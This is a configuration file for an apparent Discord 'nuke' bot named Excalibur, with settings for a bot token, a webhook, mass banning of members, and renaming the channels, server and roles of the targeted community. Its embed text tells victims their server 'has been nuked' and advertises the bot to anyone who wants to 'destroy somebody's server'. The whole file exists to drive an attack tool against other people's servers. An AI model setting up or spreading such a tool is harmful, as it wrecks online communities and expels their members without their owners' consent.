BOT_TOKEN="Bot Token"
BOT_OWNER_ID="Your ID"

MASS_BAN=true

WEBHOOK_URL="Webhook URL"
AVATAR_URL="https://i.imgur.com/cOmcxRt.jpeg"

PREFERRED_LOCALE="el"

CHANNEL_NAME=">>excalibur<<"
SERVER_NAME="<<EXCALIBUR>>"
ROLE_NAME="EXCALIBUR"


EMBED_TITLE="Your server has been nuked by Excalibur"
EMBED_DESCRIPTION="```Excalibur is one of the most powerful discord nuke bot. Unfortunately this server has been nuked due to admins' inattention.```\n\n### If you're interested in this bot or you need to destroy somebody's server you can join our discord server.\n\n\n**Blood Group has:**\n\n* `Powerful bots with uptime 24/7`\n* `Good community`\n"
